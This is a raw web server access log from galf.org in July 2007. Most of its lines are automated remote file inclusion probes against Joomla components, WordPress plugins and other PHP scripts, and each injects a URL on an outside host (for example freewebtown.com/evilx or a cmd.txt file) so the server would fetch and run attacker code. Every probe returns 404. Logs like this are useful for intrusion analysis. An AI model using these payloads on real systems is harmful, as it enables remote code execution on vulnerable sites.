89.108.67.103 - - [15/Jul/2007:18:56:17 -0700] "GET /index.php?go=http://www.francisconi.com/marisa/cadastro/.../id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:18:56:47 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:18:56:47 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:18:57:25 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:18:57:25 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.89.227.61 - - [15/Jul/2007:19:00:48 -0700] "GET /logs/access_070714.log HTTP/1.0" 404 275 "-" "Wget/1.10.2" "galf.org"
193.92.8.3 - - [15/Jul/2007:19:09:42 -0700] "GET /logs/access.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.triton.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.111.45.130 - - [15/Jul/2007:19:16:04 -0700] "GET /logs/index.php?go=http://www.chv.ro/cache/0day?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
66.111.45.130 - - [15/Jul/2007:19:16:04 -0700] "GET /logs/index.php?go=http://www.chv.ro/cache/0day?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
66.111.45.130 - - [15/Jul/2007:19:16:05 -0700] "GET /index.php?go=http://www.chv.ro/cache/0day?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
66.111.45.130 - - [15/Jul/2007:19:16:05 -0700] "GET /index.php?go=http://www.chv.ro/cache/0day?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
85.13.129.226 - - [15/Jul/2007:19:24:09 -0700] "GET /logs/index.php?go=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.13.129.226 - - [15/Jul/2007:19:24:09 -0700] "GET /index.php?go=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:19:24:28 -0700] "GET /logs/index.php?pagina=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:19:24:28 -0700] "GET /index.php?pagina=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:19:24:30 -0700] "GET /logs/index.php?go=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:19:24:31 -0700] "GET /index.php?go=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.13.129.226 - - [15/Jul/2007:19:24:44 -0700] "GET /logs/index.php?pagina=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.230.26.158 - - [15/Jul/2007:19:24:45 -0700] "GET /logs/index.php?pagina=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.13.129.226 - - [15/Jul/2007:19:24:45 -0700] "GET /index.php?pagina=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.230.26.158 - - [15/Jul/2007:19:24:45 -0700] "GET /index.php?pagina=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:19:27:52 -0700] "GET /logs/index2.php?=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:19:27:52 -0700] "GET /index2.php?=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:19:29:11 -0700] "GET /logs/index.php?pagina=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:19:29:11 -0700] "GET /index.php?pagina=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:19:36:07 -0700] "GET /logs/index2.php?=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:19:36:07 -0700] "GET /index2.php?=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
89.150.197.144 - - [15/Jul/2007:19:37:59 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedyspider/)" "www.galf.org"
89.150.197.144 - - [15/Jul/2007:19:38:00 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedyspider/)" "www.galf.org"
207.58.132.163 - - [15/Jul/2007:19:39:41 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://fake.totalh.com/b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
207.44.210.70 - - [15/Jul/2007:19:39:50 -0700] "GET /logs/index2.php?=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:19:39:50 -0700] "GET /index2.php?=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.19.79 - - [15/Jul/2007:19:40:48 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.24.101 - - [15/Jul/2007:19:40:48 -0700] "GET /logs/?D=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:19:43:00 -0700] "GET /logs/index.php?go=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:19:43:01 -0700] "GET /index.php?go=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.14.194.25 - - [15/Jul/2007:19:43:45 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/2007030919 Firefox/2.0.0.3" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:19:45:33 -0700] "GET /logs/index.php?pagina=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:19:45:33 -0700] "GET /index.php?pagina=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.73.93 - - [15/Jul/2007:19:48:19 -0700] "GET /logs/access.log HTTP/1.0" 200 32100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:19:49:44 -0700] "GET /logs/index.php?pagina=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:19:49:44 -0700] "GET /index.php?pagina=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.184.187.186 - - [15/Jul/2007:19:55:25 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
212.184.187.186 - - [15/Jul/2007:19:55:26 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
195.78.94.23 - - [15/Jul/2007:19:55:45 -0700] "GET /index.php?url=http://www.ziul.net/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.184.187.186 - - [15/Jul/2007:19:55:48 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
212.184.187.186 - - [15/Jul/2007:19:55:51 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
67.18.10.148 - - [15/Jul/2007:19:58:15 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.choiceswindowfilms.com/shop2/images/classic/Thumbs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.10.148 - - [15/Jul/2007:19:58:15 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.choiceswindowfilms.com/shop2/images/classic/Thumbs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:20:00:58 -0700] "GET /logs/access.log/middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:20:00:59 -0700] "GET /middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:20:00:59 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.230.26.158 - - [15/Jul/2007:20:02:14 -0700] "GET /logs/access.log/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.26.158 - - [15/Jul/2007:20:02:14 -0700] "GET /middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.26.158 - - [15/Jul/2007:20:02:14 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:20:03:24 -0700] "GET /logs/access.log/middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:20:03:24 -0700] "GET /middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:20:03:25 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
72.44.69.194 - - [15/Jul/2007:20:05:11 -0700] "GET /logs/access.log/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:20:05:11 -0700] "GET /middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:20:05:12 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.150.197.144 - - [15/Jul/2007:20:05:12 -0700] "GET /logs/?N=D HTTP/1.0" 200 4926 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedyspider/)" "www.galf.org"
69.48.42.218 - - [15/Jul/2007:20:06:37 -0700] "GET /logs/index.php?go=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.48.42.218 - - [15/Jul/2007:20:06:39 -0700] "GET /index.php?go=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.38.16.65 - - [15/Jul/2007:20:07:53 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.redcluster.net/modules/Forums/admin/atrix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.16.65 - - [15/Jul/2007:20:07:53 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.redcluster.net/modules/Forums/admin/atrix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.16.218.120 - - [15/Jul/2007:20:11:30 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.16.218.120 - - [15/Jul/2007:20:11:30 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.43.168.86 - - [15/Jul/2007:20:11:49 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.43.168.86 - - [15/Jul/2007:20:11:49 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.55.114 - - [15/Jul/2007:20:12:11 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.55.114 - - [15/Jul/2007:20:12:11 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.150.197.144 - - [15/Jul/2007:20:12:13 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedyspider/)" "www.galf.org"
74.6.18.35 - - [15/Jul/2007:20:12:44 -0700] "GET /labia/?M=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
128.121.79.253 - - [15/Jul/2007:20:14:32 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
128.121.79.253 - - [15/Jul/2007:20:14:32 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.elementalscraps.com/photopost/data/608/mini/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.249.73.202 - - [15/Jul/2007:20:16:00 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
66.249.73.202 - - [15/Jul/2007:20:16:00 -0700] "GET /logs/?N=A HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:20:16:57 -0700] "GET /logs/access.log/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:20:16:58 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:20:17:19 -0700] "GET /logs/access.log/middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:20:17:19 -0700] "GET /middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:20:17:20 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:20:19:19 -0700] "GET /logs/access.log/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.44.69.194 - - [15/Jul/2007:20:19:19 -0700] "GET /middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.44.69.194 - - [15/Jul/2007:20:19:19 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.218.143.52 - - [15/Jul/2007:20:20:55 -0700] "GET /logs/access.log/middle.php?page=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:20:20:55 -0700] "GET /middle.php?page=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:20:20:55 -0700] "GET /logs/middle.php?page=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.230.26.158 - - [15/Jul/2007:20:21:01 -0700] "GET /logs/access.log/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.26.158 - - [15/Jul/2007:20:21:01 -0700] "GET /middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.230.26.158 - - [15/Jul/2007:20:21:02 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:20:21:57 -0700] "GET /logs/access.log/middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:20:21:57 -0700] "GET /middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:20:21:58 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:20:22:02 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:20:22:03 -0700] "GET /middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:20:22:12 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:20:22:12 -0700] "GET /middle.php?file=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.60.122.232 - - [15/Jul/2007:20:22:14 -0700] "GET /logs/index.php?go=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.60.122.232 - - [15/Jul/2007:20:22:14 -0700] "GET /index.php?go=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.233.105.52 - - [15/Jul/2007:20:22:51 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://gak-pake.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.233.105.52 - - [15/Jul/2007:20:22:52 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://gak-pake.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.26.158 - - [15/Jul/2007:20:23:30 -0700] "GET /logs/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.230.26.158 - - [15/Jul/2007:20:23:31 -0700] "GET /middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:20:24:34 -0700] "GET /logs/access.log/middle.php?page=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:20:24:34 -0700] "GET /middle.php?page=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:20:24:34 -0700] "GET /logs/middle.php?page=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.230.26.158 - - [15/Jul/2007:20:25:19 -0700] "GET /logs/access.log/middle.php?page=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.26.158 - - [15/Jul/2007:20:25:19 -0700] "GET /middle.php?page=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.26.158 - - [15/Jul/2007:20:25:20 -0700] "GET /logs/middle.php?page=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
207.44.210.70 - - [15/Jul/2007:20:26:41 -0700] "GET /logs/access.log/middle.php?page=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:20:26:41 -0700] "GET /middle.php?page=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:20:26:41 -0700] "GET /logs/middle.php?page=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.48.42.218 - - [15/Jul/2007:20:29:28 -0700] "GET /logs/index2.php?=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.48.42.218 - - [15/Jul/2007:20:29:30 -0700] "GET /index2.php?=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:20:30:24 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.218.143.52 - - [15/Jul/2007:20:30:24 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.60.122.232 - - [15/Jul/2007:20:31:05 -0700] "GET /logs/index.php?pagina=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.60.122.232 - - [15/Jul/2007:20:31:06 -0700] "GET /index.php?pagina=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.59.192.114 - - [15/Jul/2007:20:32:36 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tatabr4.prohosts.org/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.59.192.114 - - [15/Jul/2007:20:32:36 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tatabr4.prohosts.org/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:20:32:52 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.210.70 - - [15/Jul/2007:20:32:52 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/evilx/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.230.26.158 - - [15/Jul/2007:20:33:10 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.26.158 - - [15/Jul/2007:20:33:11 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
209.59.192.114 - - [15/Jul/2007:20:35:21 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tatabr4.prohosts.org/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.59.192.114 - - [15/Jul/2007:20:35:21 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tatabr4.prohosts.org/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.59.192.114 - - [15/Jul/2007:20:35:21 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tatabr4.prohosts.org/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:20:36:08 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.44.69.194 - - [15/Jul/2007:20:36:08 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:20:37:33 -0700] "GET /logs/access.log/middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.19.59.5 - - [15/Jul/2007:20:37:34 -0700] "GET /middle.php?file=http://www.freewebtown.com/mafiaa/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
